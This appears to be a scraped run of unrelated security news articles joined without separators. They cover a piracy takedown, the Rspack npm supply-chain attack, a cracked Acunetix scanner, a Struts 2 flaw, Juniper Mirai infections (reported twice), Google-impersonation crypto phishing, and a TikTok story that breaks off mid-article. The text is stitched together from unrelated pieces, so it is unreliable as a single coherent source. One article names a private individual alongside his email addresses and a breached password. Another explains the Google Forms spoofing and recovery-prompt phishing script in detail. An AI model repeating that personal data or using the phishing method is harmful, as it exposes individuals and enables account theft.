The Alliance for Creativity and Entertainment (ACE) has taken down one of the world’s largest live sports streaming piracy rings, with over 821 million visits last year.
ACE says the Markkystreams Vietnam-based operation was the largest illegal sports streaming service it has shut down to date.
The piracy ring primarily targeted audiences across the United States and Canada, streaming sports events daily from all the U.S. sports leagues and global leagues of every category. ACE says this operation affected all its members, including sports tier members DAZN, beIN Sports, and Canal+.
“The shutdown of this globally notorious live sports piracy ring is a huge victory in our campaign against the piracy of live sports programs and follows other recent successful actions by ACE and law enforcement in Vietnam,” said Larissa Knapp, Executive Vice President at the Motion Picture Association (MPA), on Thursday.
“ACE’s live sports members face a unique threat when it comes to digital piracy, as live sports broadcasts lose substantial commercial value once the game ends. The takedown serves as a warning to piracy operators everywhere – including operators in live sports piracy – that ACE will identify and shut down their illegal operations.”
The anti-piracy group says the ring’s Hanoi-based operators handed over control to 138 domains, including the bestsolaris[dot]com, streameast[dot]to, markkystreams[dot]com, crackstreams[dot]dev, and weakspell[dot]to domains.
“This website is no longer available due to copyright infringement. Do not put yourself at risk by using or subscribing to illegal streaming services,” a banner displayed on the seized websites reads.
ACE seizure banner (BleepingComputer)
ACE is a coalition of over 50 media and entertainment companies, including the world’s largest film studios and television networks, focused on shuttering illegal streaming services since June 2017.
Its governing board includes Amazon, Apple TV+, Universal Studios, The Walt Disney Studios, Netflix, Paramount Global, Sony Pictures, and Warner Bros. Discovery.
Since its launch, ACE has taken down a long list of piracy platforms, including the Openload and Streamango streaming providers in October 2019, the pirate IPTV service Beast IPTV in December 2020, the 123movies.la streaming site in May 2021, and the world’s largest anime pirate site Zoro.to in July 2023.
ACE also works with law enforcement organizations like the U.S. Department of Justice, Europol, and Interpol in operations targeting large-scale illegal streaming rings.
The developers of Rspack have revealed that two of their npm packages, @rspack/core and @rspack/cli, were compromised in a software supply chain attack that allowed a malicious actor to publish malicious versions to the official package registry with cryptocurrency mining malware.
Following the discovery, versions 1.1.7 of both libraries have been unpublished from the npm registry. The latest safe version is 1.1.8.
“They were released by an attacker who gained unauthorized npm publishing access, and contain malicious scripts,” software supply chain security firm Socket said in an analysis.
Rspack is billed as an alternative to the webpack, offering a “high performance JavaScript bundler written in Rust.” Originally developed by ByteDance, it has since been adopted by several companies such as Alibaba, Amazon, Discord, and Microsoft, among others.
The npm packages in question, @rspack/core, and @rspack/cli, attract weekly downloads of over 300,000 and 145,000, respectively, indicative of their popularity.
An analysis of the rogue versions of the two libraries has revealed that they incorporate code to make calls to a remote server (“80.78.28[.]72”) in order to transmit sensitive configuration details such as cloud service credentials, while also collecting IP address and location details by making an HTTP GET request to “ipinfo[.]io/json.”
In an interesting twist, the attack also limits the infection to machines located in a specific set of countries, such as China, Russia, Hong Kong, Belarus, and Iran.
The end goal of the attacks is to trigger the download and execution of an XMRig cryptocurrency miner on compromised Linux hosts upon installation of the packages by means of a postinstall script specified in the “package.json” file.
“The malware is executed via the postinstall script, which runs automatically when the package is installed,” Socket said. “This ensures the malicious payload is executed without any user action, embedding itself into the target environment.”
Besides publishing a new version of the two packages sans the malicious code, the project maintainers said they invalidated all existing npm tokens and GitHub tokens, checked the permissions of the repository and npm packages, and audited the source code for any potential vulnerabilities. An investigation into the root cause of the token theft is underway.
“This attack highlights the need for package managers to adopt stricter safeguards to protect developers, like enforcing attestation checks, to prevent updating to unverified versions,” Socket said. “But it’s not totally bullet-proof.”
“As seen in the recent Ultralytics supply chain attack in the Python ecosystem, attackers may still be able to publish versions with attestation by compromising GitHub Actions through cache poisoning.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.
Araneida Scanner.
Cyber threat analysts at Silent Push said they recently received reports from a partner organization that identified an aggressive scanning effort against their website using an Internet address previously associated with a campaign by FIN7, a notorious Russia-based hacking group.
But on closer inspection they discovered the address contained an HTML title of “Araneida Customer Panel,” and found they could search on that text string to find dozens of unique addresses hosting the same service.
It soon became apparent that Araneida was being resold as a cloud-based service using a cracked version of Acunetix, allowing paying customers to conduct offensive reconnaissance on potential target websites, scrape user data, and find vulnerabilities for exploitation.
Silent Push also learned Araneida bundles its service with a robust proxy offering, so that customer scans appear to come from Internet addresses that are randomly selected from a large pool of available traffic relays.
The makers of Acunetix, Texas-based application security vendor Invicti Security, confirmed Silent Push’s findings, saying someone had figured out how to crack the free trial version of the software so that it runs without a valid license key.
“We have been playing cat and mouse for a while with these guys,” said Matt Sciberras, chief information security officer at Invicti.
Silent Push said Araneida is being advertised by an eponymous user on multiple cybercrime forums. The service’s Telegram channel boasts nearly 500 subscribers and explains how to use the tool for malicious purposes.
In a “Fun Facts” list posted to the channel in late September, Araneida said their service was used to take over more than 30,000 websites in just six months, and that one customer used it to buy a Porsche with the payment card data (“dumps”) they sold.
Araneida Scanner’s Telegram channel bragging about how customers are using the service for cybercrime.
“They are constantly bragging with their community about the crimes that are being committed, how it’s making criminals money,” said Zach Edwards, a senior threat researcher at Silent Push. “They are also selling bulk data and dumps which appear to have been acquired with this tool or due to vulnerabilities found with the tool.”
Silent Push also found a cracked version of Acunetix was powering at least 20 instances of a similar cloud-based vulnerability testing service catering to Mandarin speakers, but they were unable to find any apparently related sales threads about them on the dark web.
According to an August 2023 report (PDF) from the U.S. Department of Health and Human Services (HHS), Acunetix (presumably a cracked version) is among several tools used by APT 41, a prolific Chinese state-sponsored hacking group.
THE TURKISH CONNECTION
Silent Push notes that the website where Araneida is being sold — araneida[.]co — first came online in February 2023. But a review of this Araneida nickname on the cybercrime forums shows they have been active in the criminal hacking scene since at least 2018.
A search in the threat intelligence platform Intel 471 shows a user by the name Araneida promoted the scanner on two cybercrime forums since 2022, including Breached and Nulled. In 2022, Araneida told fellow Breached members they could be reached on Discord at the username “Ornie#9811.”
According to Intel 471, this same Discord account was advertised in 2019 by a person on the cybercrime forum Cracked who used the monikers “ORN” and “ori0n.” The user “ori0n” mentioned in several posts that they could be reached on Telegram at the username “@sirorny.”
Orn advertising Araneida Scanner in Feb. 2023 on the forum Cracked. Image: Ke-la.com.
The Sirorny Telegram identity also was referenced as a point of contact for a current user on the cybercrime forum Nulled who is selling website development services, and who references araneida[.]co as one of their projects. That user, “Exorn,” has posts dating back to August 2018.
In early 2020, Exorn promoted a website called “orndorks[.]com,” which they described as a service for automating the scanning for web-based vulnerabilities. A passive DNS lookup on this domain at DomainTools.com shows that its email records pointed to the address ori0nbusiness@protonmail.com.
Constella Intelligence, a company that tracks information exposed in data breaches, finds this email address was used to register an account at Breachforums in July 2024 under the nickname “Ornie.” Constella also finds the same email registered at the website netguard[.]codes in 2021 using the password “ceza2003” [full disclosure: Constella is currently an advertiser on KrebsOnSecurity].
A search on the password ceza2003 in Constella finds roughly a dozen email addresses that used it in an exposed data breach, most of them featuring some variation on the name “altugsara,” including altugsara321@gmail.com. Constella further finds altugsara321@gmail.com was used to create an account at the cybercrime community RaidForums under the username “ori0n,” from an Internet address in Istanbul.
According to DomainTools, altugsara321@gmail.com was used in 2020 to register the domain name altugsara[.]com. Archive.org’s history for that domain shows that in 2021 it featured a website for a then 18-year-old Altuğ Şara from Ankara, Turkey.
Archive.org’s recollection of what altugsara dot com looked like in 2021.
LinkedIn finds this same altugsara[.]com domain listed in the “contact info” section of a profile for an Altug Sara from Ankara, who says he has worked the past two years as a senior software developer for a Turkish IT firm called Bilitro Yazilim.
Neither Altug Sara nor Bilitro Yazilim responded to requests for comment.
Invicti’s website states that it has offices in Ankara, but the company’s CEO said none of their employees recognized either name.
“We do have a small team in Ankara, but as far as I know we have no connection to the individual other than the fact that they are also in Ankara,” Invicti CEO Neil Roseman told KrebsOnSecurity.
Researchers at Silent Push say despite Araneida using a seemingly endless supply of proxies to mask the true location of its users, it is a fairly “noisy” scanner that will kick off a large volume of requests to various API endpoints, and make requests to random URLs associated with different content management systems.
What’s more, the cracked version of Acunetix being resold to cybercriminals invokes legacy Acunetix SSL certificates on active control panels, which Silent Push says provides a solid pivot for finding some of this infrastructure, particularly from the Chinese threat actors.
On Call Digital technology remains frighteningly finickity, which is why good tech support people are always in demand – and also the reason The Register never tires of telling your support stories each Friday in On Call, the column your generosity makes possible.
This week, meet a reader we’ll Regomize as “Boris” who years ago worked for a business providing services to what he described as “a large international automotive company” that ran its production planning application on an old school mainframe – proper supervillain lair kit, with big tape drives whirring away all day.
The IT director at this client had a temper.
“He was known and feared as someone who ate systems support people for breakfast.”
Boris was therefore far from thrilled when he was called in to address a problem his colleagues had been unable to address.
“The planning application would sometimes suddenly hang at random points without any obvious reason,” Boris told On Call. “This was very upsetting as delays in the availability of manufacturing schedules interfered with plant operations, which cost serious money.”
Hardware experts were put on trans-Atlantic flights so they could pore over the mainframe’s innards. Software engineers who had hand-coded the machine’s OS were sent to find faults.
None could determine the cause of the hangs. Indeed, all reported the machine was working as intended. All systems nominal.
Those investigations consumed months – and did not make the client happier.
Indeed, the irate IT director began making serious noises about seeking compensation and junking the mainframe.
In desperation, Boris was asked to examine the situation.
Boris wasn’t thrilled about that, as his skill set – engineering and scientific matters – was not obviously applicable to the situation. And he knew nothing about scheduling assembly lines.
He nonetheless visited the client’s office, and was quickly “shouted at and threatened by the IT director.”
Boris managed to retain sufficient composure to ask for the application’s source code.
“Fortuitously it was in Fortran – one of the programming languages I was very familiar with,” Boris told On Call. It also contained an obvious error that he spotted after about ten minutes.
“The code assumed that all the tapes were at their start point. Whether or not the program would run successfully depended on the state of the tapes left by any previously executed application. Sometimes it would run, and sometimes not.”
The fix seemed simple: a Rewind All; statement in the code – one at the start and one at the end – would surely ensure the tape was always at the start point when the application ran.
Boris recompiled the software, ran it, and relaxed as the problem went away.
Which is where his troubles began – because the abusive IT director took a shine to him.
“Forever after I was his ‘go to’ person for advice on almost everything from hardware selection decisions to application development and I was treated with reverence and the appropriate level of respect by all.”
But Boris knew this couldn’t last – because his Fortran fix was fortuitous. He therefore lived in fear of being found out and ending up on the wrong side of the abusive IT director’s wrath.
“Fortunately, I was moved overseas on a different project before my limitations could be tested,” he told On Call.
Phew!
Have you ever found a fix despite not being an expert in the troubled tech you were asked to tend? If so, click here to send On Call an email so we can feature your story after the festive season.
On Call wishes readers all the best for their end-of-year celebrations, and thanks you all for the weekly gift of your stories. ®
The introduction of new cybersecurity disclosure rules by the U.S. Securities and Exchange Commission has led to a significant uptick in the number of reported cybersecurity incidents from public companies, according to a leading U.S. law firm that specializes in finance and M&A activity.
Analysis by Paul Hastings LLP found that since the disclosure law went into effect in 2023, there has been a 60% increase in disclosures of cybersecurity incidents, and 78% of disclosures were made within eight days of discovery of the incident.
The regulations require public companies to disclose material cybersecurity incidents within four business days of determining their materiality, aiming to provide investors with timely and relevant information that could impact investment decisions.
Despite the increase in disclosures, less than 10% of disclosures detailed the material impacts of these incidents, revealing potential hesitancy or difficulty in assessing comprehensive impacts swiftly. Companies are often faced with the challenge of balancing detailed reporting with the protection of sensitive operation details, as the rules do not mandate disclosing specific technical details that could hinder remediation efforts.
Michelle Reed, co-chair of Paul Hastings’ data privacy and cybersecurity practice, said the hesitancy is likely because companies are disclosing very quickly, so as to not be penalized by the SEC for delayed disclosure.
“The coming year will be an interesting testing ground on how materiality in the cyber world ultimately shakes out,” Reed told CyberScoop.
The materiality clause has led to inconsistent outcomes among companies that have publicly disclosed a cybersecurity incident. For instance, the ransomware attack on automotive software provider CDK Global in June resulted in varying degrees of materiality disclosures. CDK’s parent company, Brookfield Business Partners, said in their July disclosure they did not “expect this incident to have a material impact” on their business despite paying a $25 million ransom.
Some other car dealerships also filed disclosures saying the attack on CDK negatively impacted their company, but stopped short of saying the incident caused a “material impact.”
Reed told CyberScoop these cases illuminate the ambiguity companies face in determining the depth of information necessary for reporting, while avoiding the disclosure of sensitive security measures that could exacerbate vulnerabilities and lead to lawsuits.
“Materiality is a sliding scale, weighing risk and likelihood of impact,” she said. “The exact same breach could happen to two different companies, and based on size of the company and effectiveness of their incident response, one may have to disclose and the other may not.”
An additional concern covered in the report is the prevalence of third-party breaches, which account for 1 in 4 incidents. The report points out this kind of cybersecurity incident leads to further dilemmas for companies on whether to disclose third-party breaches, particularly when other companies may have disclosed an incident related to the same breach.
You can read the full report on Paul Hastings’ website.
A critical, stubborn new vulnerability in Apache Struts 2 may be under active exploitation already, and fixing it isn’t as simple as downloading a patch.
Struts 2 is an open source (OSS) framework for building Java applications. Though long past its prime, Struts 2 remains common in older legacy systems across industries. In fact, its prevalence combined with its agedness is what makes its newly discovered vulnerability — CVE-2024-53677, CVSS 9.5 — so tricky. As its components have withered, and newer technologies and security practices have moved on, fixing any newly arising issues like this can require more than just a standard patch.
“The risk lies in the fact that older applications are less likely to be integrated with a modern CI/CD pipeline,” explains Chris Wysopal, chief security evangelist at Veracode. “As a result, updating the Struts 2 library, building and deploying a new version of a vulnerable application requires more manual effort and takes significantly longer. This significant effort will result in a longer window of vulnerability, during which attackers may exploit and take advantage of this weakness.”
He assesses that “It is likely that we will see the exploitation of this vulnerability for weeks as organizations find and fix all instances of Struts 2 usage.”
This same time last year, nearly to the day, a Struts 2 vulnerability with a “critical” 9.8 score in the Common Vulnerability Scoring System (CVSS) was disclosed to the public. CVE-2023-50164 resulted from attackers’ ability to manipulate file upload parameters, opening the door to path traversal. Under certain conditions an attacker could upload a specially crafted malicious script in order to achieve remote code execution (RCE) on a server.
CVE-2024-53677 is CVE-2023-50164 regen. It, too, lies in Struts 2’s File Upload Interceptor component, responsible for handling file uploads, and enables RCE via path traversal. In a blog post, Johannes Ullrich of the SANS Institute speculated that an inadequate patch for CVE-2023-50164 led to this latest deja vu.
He also observed active exploitation attempts from one IP address, which utilized a public proof-of-concept (PoC). The attacker played with the vulnerability by uploading “a one-liner script that is supposed to return ‘Apache Struts.’ Next, the attacker attempts to find the uploaded script. The exploit attempt is very close to the original PoC. Since then, a slightly improved exploit has been uploaded to the same GitHub repository,” he wrote.
Typically in situations such as this, organizations are advised to apply patches as soon as possible. In the case of CVE-2024-53677, the story isn’t quite as simple.
Organizations do need to upgrade to the latest version of Struts, 6.7.0 — or, at least, 6.4.0, released in the wake of CVE-2023-50164, which deprecated the File Upload Interceptor at issue. The fix isn’t backwards compatible, however, Apache noted in its security bulletin. IT teams will need to migrate to the newfangled Action File Upload Interceptor, and adjust how their existing applications handle file uploads by diligently rewriting their code to make use of it.
“It’s not a simple version bump,” warns Saeed Abbasi, manager of vulnerability research at Qualys. “It requires code rewrites, configuration adjustments, and can break existing logic and dependencies. In complex environments, removing all traces of the legacy interceptor poses significant challenges due to intricate plugin chains and layered frameworks. This complexity is further compounded by the need for extensive regression testing.”
The Potential Scope of Impact for CVE-2024-53677
The national centers for cybersecurity in Australia, Belgium, Canada, Singapore, and the UK have all released urgent security warnings regarding CVE-2024-53677. That this issue has attracted so much attention may not be obvious at first, since Struts 2 is so rarely used by developers today. It does, however, live on in legacy systems worldwide.
In the 2000s, Struts 2 was king among Java Web frameworks. By 2007 it was receiving nearly 350,000 downloads per month. Its webpage received millions of monthly visits, even its newsletter had thousands of subscribers. Today, Wysopal says, “It no longer has mainstream appeal and is rarely chosen for new projects. Its presence is more an artifact of historical adoption rather than active popularity.”
“Its ‘kingdom’ is confined to those stable, older applications in conservative industries — particularly finance, insurance, government, and large-scale manufacturing or logistics — often in organizations and regions that are regulated and less likely to modernize,” he says. Case in point: a Struts 2 vulnerability was at the heart of the infamous 2017 Equifax breach.
Just how common is Struts 2 in legacy systems in 2024? Abbasi reports that within the first 24 hours following the disclosure of CVE-2024-53677, Qualys “observed tens of thousands of vulnerable instances, reflecting the breadth and urgency of the challenge.”
To his view, “The persistence of Struts 2 in critical systems, long after more secure frameworks have emerged, illustrates the ongoing struggle enterprises face with technical debt. Many organizations run versions of Struts past their end-of-life, without proper planning which compounds the impact of new vulnerabilities. Enterprises need solid attack surface management, along with lifecycle management strategies, ensuring that critical frameworks are regularly updated, and deprecated components are swiftly phased out.”
Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials.
As the networking infrastructure company explained, the malware scans for devices with default login credentials and executes commands remotely after gaining access, enabling a wide range of malicious activities.
The campaign was first observed on December 11, when the first infected routers were found on customers’ networks. Later, the operators of this Mirai-based botnet used the compromised devices to launch distributed denial-of-service (DDoS) attacks.
“On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms,” says a security advisory published this Tuesday.
“Any customer not following recommended best practices and still using default passwords can be considered compromised as the default SSR passwords have been added to the virus database.”
Juniper also shared indicators of compromise admins should look for on their networks and devices to detect potential Mirai malware activity, including:
scans for devices on common Layer 4 ports (e.g., 23, 2323, 80, 8080),
failed login attempts on SSH services indicative of brute-force attacks,
sudden spike in outbound traffic volume hinting at devices being co-opted in DDoS attacks,
devices rebooting or behaving erratically, suggesting they’ve been compromised,
SSH connections from known malicious IP addresses.
The company advised customers to immediately ensure their devices follow recommended username and password policies, including changing the default credentials on all Session Smart routers and using unique and strong passwords across all devices.
Admins are also recommended to keep firmware updated, review access logs for anomalies, set alerts automatically triggered when suspicious activity is detected, deploy intrusion detection systems to monitor network activity, and use firewalls to block unauthorized access to Internet-exposed devices.
Juniper also warned that routers already infected in these attacks must be reimaged before being brought back online.
“If a system is found to be infected, the only certain way of stopping the threat is by reimaging the system as it cannot be determined exactly what might have been changed or obtained from the device,” Juniper said.
Last year, in August, the ShadowServer threat monitoring service warned of ongoing attacks targeting a critical remote code execution exploit chain impacting Juniper EX switches and SRX firewalls using a watchTowr Labs proof-of-concept (PoC) exploit.
Since then, Juniper also warned of a critical RCE bug in its firewalls and switches in January and released an out-of-cycle patch for a maximum-severity authentication bypass flaw in its Session Smart Router (SSR), Session Smart Conductor, and WAN Assurance Router products.
Juniper Networks is warning that Session Smart Router (SSR) products with default passwords are being targeted as part of a malicious campaign that deploys the Mirai botnet malware.
The company said it’s issuing the advisory after “several customers” reported anomalous behavior on their Session Smart Network (SSN) platforms on December 11, 2024.
“These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network,” it said. “The impacted systems were all using default passwords.”
Mirai, which has had its source code leaked in 2016, has spawned several variants over the years. The malware is capable of scanning for known vulnerabilities as well as default credentials to infiltrate devices and enlist them into a botnet for mounting distributed denial-of-service (DDoS) attacks.
To mitigate such threats, organizations are recommended to change their passwords with immediate effect to strong, unique ones (if not already), periodically audit access logs for signs of suspicious activity, use firewalls to block unauthorized access, and keep software up-to-date.
Some of the indicators associated with Mirai attacks include unusual port scanning, frequent SSH login attempts indicating brute-force attacks, increased outbound traffic volume to unexpected IP addresses, random reboots, and connections from known malicious IP addresses.
“If a system is found to be infected, the only certain way of stopping the threat is by reimaging the system as it cannot be determined exactly what might have been changed or obtained from the device,” the company said.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that poorly managed Linux servers, particularly publicly exposed SSH services, are being targeted by a previously undocumented DDoS malware family dubbed cShell.
“cShell is developed in the Go language and is characterized by exploiting Linux tools called screen and hping3 to perform DDoS attacks,” ASEC said.
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click “yes” to a Google prompt on his mobile device.
Griffin is a battalion chief firefighter in the Seattle area, and on May 6 he received a call from someone claiming they were from Google support saying his account was being accessed from Germany. A Google search on the phone number calling him — (650) 203-0000 — revealed it was an official number for Google Assistant, an AI-based service that can engage in two-way conversations.
At the same time, he received an email that came from a google.com email address, warning his Google account was compromised. The message included a “Google Support Case ID number” and information about the Google representative supposedly talking to him on the phone, stating the rep’s name as “Ashton”— the same name given by the caller.
Griffin didn’t learn this until much later, but the email he received had a real google.com address because it was sent via Google Forms, a service available to all Google Docs users that makes it easy to send surveys, quizzes and other communications.
A phony security alert Griffin received prior to his bitcoin heist, via Google Forms.
According to tripwire.com’s Graham Cluely, phishers will use Google Forms to create a security alert message, and then change the form’s settings to automatically send a copy of the completed form to any email address entered into the form. The attacker then sends an invitation to complete the form to themselves, not to their intended victim.
“So, the attacker receives the invitation to fill out the form – and when they complete it, they enter their intended victim’s email address into the form, not their own,” Cluely wrote in a December 2023 post. “The attackers are taking advantage of the fact that the emails are being sent out directly by Google Forms (from the google.com domain). It’s an established legitimate domain that helps to make the email look more legitimate and is less likely to be intercepted en route by email-filtering solutions.”
The fake Google representative was polite, patient, professional and reassuring. Ashton told Griffin he was going to receive a notification that would allow him to regain control of the account from the hackers. Sure enough, a Google prompt instantly appeared on his phone asking, “Is it you trying to recover your account?”
Adam Griffin clicked “yes,” to an account recovery notification similar to this one on May 6.
Griffin said that after receiving the pop-up prompt from Google on his phone, he felt more at ease that he really was talking to someone at Google. In reality, the thieves caused the alert to appear on his phone merely by stepping through Google’s account recovery process for Griffin’s Gmail address.
“As soon as I clicked yes, I gave them access to my Gmail, which was synched to Google Photos,” Griffin said.
Unfortunately for Griffin, years ago he used Google Photos to store an image of the secret seed phrase that was protecting his cryptocurrency wallet. Armed with that phrase, the phishers could drain all of his funds.
“From there they were able to transfer approximately $450,000 out of my Exodus wallet,” Griffin recalled.
Griffin said just minutes after giving away access to his Gmail account he received a call from someone claiming to be with Coinbase, who likewise told him someone in Germany was trying to take over his account.
Griffin said a follow-up investigation revealed the attackers had used his Gmail account to gain access to his Coinbase account from a VPN connection in California, providing the multi-factor code from his Google Authenticator app. Unbeknownst to him at the time, Google Authenticator by default also makes the same codes available in one’s Google account online.
But when the thieves tried to move $100,000 worth of cryptocurrency out of his account, Coinbase sent an email stating that the account had been locked, and that he would have to submit additional verification documents before he could do anything with it.
GRAND THEFT AUTOMATED
Just days after Griffin was robbed, a scammer impersonating Google managed to phish 45 bitcoins — approximately $4,725,000 at today’s value — from Tony, a 42-year-old professional from northern California. Tony agreed to speak about his harrowing experience on condition that his last name not be used.
Tony got into bitcoin back in 2013 and has been investing in it ever since. On the evening of May 15, 2024, Tony was putting his three- and one-year-old boys to bed when he received a message from Google about an account security issue, followed by a phone call from a “Daniel Alexander” at Google who said his account was compromised by hackers.
Tony said he had just signed up for Google’s Gemini AI (an artificial intelligence platform formerly known as “Bard”), and mistakenly believed the call was part of that service. Daniel told Tony his account was being accessed by someone in Frankfurt, Germany, and that he could evict the hacker and recover access to the account by clicking “yes” to the prompt that Google was going to send to his phone.
The Google prompt arrived seconds later. And to his everlasting regret, Tony clicked the “Yes, it’s me” button.
Then came another call, this one allegedly from security personnel at Trezor, a company that makes encrypted hardware devices made to store cryptocurrency seed phrases securely offline. The caller said someone had submitted a request to Trezor to close his account, and they forwarded Tony a message sent from his Gmail account that included his name, Social Security number, date of birth, address, phone number and email address.
Tony said he began to believe then that his Trezor account truly was compromised. The caller convinced him to “recover” his account by entering his cryptocurrency seed phrase at a phishing website (verify-trezor[.]io) that mimicked the official Trezor website.
“At this point I go into fight or flight mode,” Tony recalled. “I’ve got my kids crying, my wife is like what the heck is going on? My brain went haywire. I put my seed phrase into a phishing site, and that was it.”
Almost immediately, all of the funds he was planning to save for retirement and for his children’s college fund were drained from his account.
“I made mistakes due to being so busy and not thinking correctly,” Tony told KrebsOnSecurity. “I had gotten so far away from the security protocols in bitcoin as life had changed so much since having kids.”
Tony shared this text message exchange of him pleading with his tormentors after being robbed of 45 bitcoins.
Tony said the theft left him traumatized and angry for months.
“All I was thinking about was protecting my boys and it ended up costing me everything,” he said. “Needless to say I’m devastated and have had to do serious therapy to get through it.”
MISERY LOVES COMPANY
Tony told KrebsOnSecurity that in the weeks following the theft of his 45 bitcoins, he became so consumed with rage and shame that he was seriously contemplating suicide. Then one day, while scouring the Internet for signs that others may have been phished by Daniel, he encountered Griffin posting on Reddit about the phone number involved in his recent bitcoin theft.
Griffin said the two of them were initially suspicious of each other — exchanging cautious messages for about a week — but he decided Tony was telling the truth after contacting the FBI agent that Tony said was working his case. Comparing notes, they discovered the fake Google security alerts they received just prior to their individual bitcoin thefts referenced the same phony “Google Support Case ID” number.
Adam Griffin and Tony said they received the same Google Support Case ID number in advance of their thefts. Both were sent via Google Forms, which sends directly from the google.com domain name.
More importantly, Tony recognized the voice of “Daniel from Google” when it was featured in an interview by Junseth, a podcaster who covers cryptocurrency scams. The same voice that had coaxed Tony out of his considerable cryptocurrency holdings just days earlier also had tried to phish Junseth, who played along for several minutes before revealing he knew it was a scam.
Daniel told Junseth he was a teenager and worked with other scam callers who had all met years ago on the game Minecraft, and that he recently enjoyed a run of back-to-back Gmail account compromises that led to crypto theft paydays.
“No one gets arrested,” Daniel enthused to Junseth in the May 7 podcast, which quickly went viral on social media. “It’s almost like there’s no consequences. I have small legal side hustles, like businesses and shit that I can funnel everything through. If you were to see me in real life, I look like a regular child going to school with my backpack and shit, you’d never expect this kid is stealing all this shit.”
Daniel explained that they often use an automated bot that initiates calls to targets warning that their account is experiencing suspicious activity, and that they should press “1” to speak with a representative. This process, he explained, essentially self-selects people who are more likely to be susceptible to their social engineering schemes. [It is possible — but not certain — that this bot Daniel referenced explains the incoming call to Griffin from Google Assistant that precipitated his bitcoin heist].
Daniel told Junseth he and his co-conspirators had just scored a $1.2 million theft that was still pending on the bitcoin investment platform SwanBitcoin. In response, Junseth tagged SwanBitcoin in a post about his podcast on Twitter/X, and the CEO of Swan quickly replied that they caught the $1.2 million transaction that morning.
Apparently, Daniel didn’t appreciate having his voice broadcast to the world (or his $1.2 million bitcoin heist disrupted) because according to Junseth someone submitted a baseless copyright infringement claim about it to Soundcloud, which was hosting the recording.
The complaint alleged the recording included a copyrighted song, but that wasn’t true: Junseth later posted a raw version of the recording to Telegram, and it clearly had no music in the background. Nevertheless, Soundcloud removed the audio file.
“All these companies are very afraid of copyright,” Junseth explained in a May 2024 interview with the podcast whatbitcoindid.com, which features some of the highlights from his recorded call with Daniel.
“It’s interesting because copyright infringement really is an act that you’re claiming against the publisher, but for some reason these companies have taken a very hard line against it, so if you even claim there’s copyrighted material in it they just take it down and then they leave it to you to prove that you’re innocent,” Junseth said. “In Soundcloud’s instance, part of declaring your innocence is you have to give them your home address and everything else, and it says right on there, ‘this will be provided to the person making the copyright claim.’”
AFTERMATH
When Junseth asked how potential victims could protect themselves, Daniel explained that if the target doesn’t have their Google Authenticator synced to their Google cloud account, the scammers can’t easily pivot into the victim’s accounts at cryptocurrency exchanges, as they did with Griffin.
By default, Google Authenticator syncs all one-time codes with a Gmail user’s account, meaning if someone gains access to your Google account, they can then access all of the one-time codes handed out by your Google Authenticator app.
To change this setting, open Authenticator on your mobile device, select your profile picture, and then choose “Use without an Account” from the menu. If you disable this, it’s a good idea to keep a printed copy of one-time backup codes, and to store those in a secure place.
You may also wish to download Google Authenticator to another mobile device that you control. Otherwise, if you turn off cloud synching and lose that sole mobile device with your Google Authenticator app, it could be difficult or impossible to recover access to your account if you somehow get locked out.
Griffin told KrebsOnSecurity he had no idea it was so easy for thieves to take over his account, and to abuse so many different Google services in the process.
“I know I definitely made mistakes, but I also know Google could do a lot better job protecting people,” he said.
In response to questions from KrebsOnSecurity, Google said it can confirm that this was a narrow phishing campaign, reaching a “very small group of people.”
“We’re aware of this narrow and targeted attack, and have hardened our defenses to block recovery attempts from this actor,” the company said in a written statement, which emphasized that the real Google will never call you.
“While these types of social engineering campaigns are constantly evolving, we are continuously working to harden our systems with new tools and technical innovations, as well as sharing updated guidance with our users to stay ahead of attackers,” the statement reads.
Both Griffin and Tony say they continue to receive “account security” calls from people pretending to work for Google or one of the cryptocurrency platforms.
“It’s like you get put on some kind of list, and then those lists get recycled over and over,” Tony said.
Griffin said that for several months after his ordeal, he accepted almost every cryptocurrency scam call that came his way, playing along in the vain hope of somehow tricking the caller into revealing details about who they are in real life. But he stopped after his taunting caused one of the scammers to start threatening him personally.
“I probably shouldn’t have, but I recorded two 30-minute conversations with these guys,” Griffin said, acknowledging that maybe it wasn’t such a great idea to antagonize cybercriminals who clearly already knew everything about him. “One guy I talked to about his personal life, and then his friend called me up and said he was going to dox me and do all this other bad stuff. My FBI contact later told me not to talk to these guys anymore.”
Sound advice. So is hanging up whenever anyone calls you about a security problem with one of your accounts. Even security-conscious people tend to underestimate the complex and shifting threat from phone-based phishing scams, but they do so at their peril.
When in doubt: Hang up, look up, and call back. If your response to these types of calls involves anything other than hanging up, researching the correct phone number, and contacting the entity that claims to be calling, you may be setting yourself up for a costly and humbling learning experience.
Understand that your email credentials are more than likely the key to unlocking your entire digital identity. Be sure to use a long, unique passphrase for your email address, and never pick a passphrase that you have ever used anywhere else (not even a variation on an old password).
Finally, it’s also a good idea to take advantage of the strongest multi-factor authentication methods offered. For Gmail/Google accounts, that includes the use of passkeys or physical security keys, which are heavily phishing resistant. For Google users holding measurable sums of cryptocurrency, the most secure option is Google’s free Advanced Protection program, which includes more extensive account security features but also comes with some serious convenience trade-offs.
The US Supreme Court has decided to consider made-in-China social network TikTok’s appeal against the law that requires it to shift to local ownership, or close, by January 19.
TikTok and its owner ByteDance have argued that the Protecting Americans from Foreign Adversary Controlled Applications Act (PFACAA) is unconstitutional because it will rob its 170 million US users of their right to free speech. The Biden administration introduced the law as it feels TikTok is a threat to national security and citizens’ privacy. Despite assurances that the social network stores data in the US, it operates tools allowing ByteDance workers in China to access personal information about US users.
A series of court challenges followed passage of the PFACAA, the most recent and significant of which was the early December decision by the US Court of Appeals for the District of Columbia that found the Act was justifiable on national security grounds, and disregarded TikTok’s free speech argument.
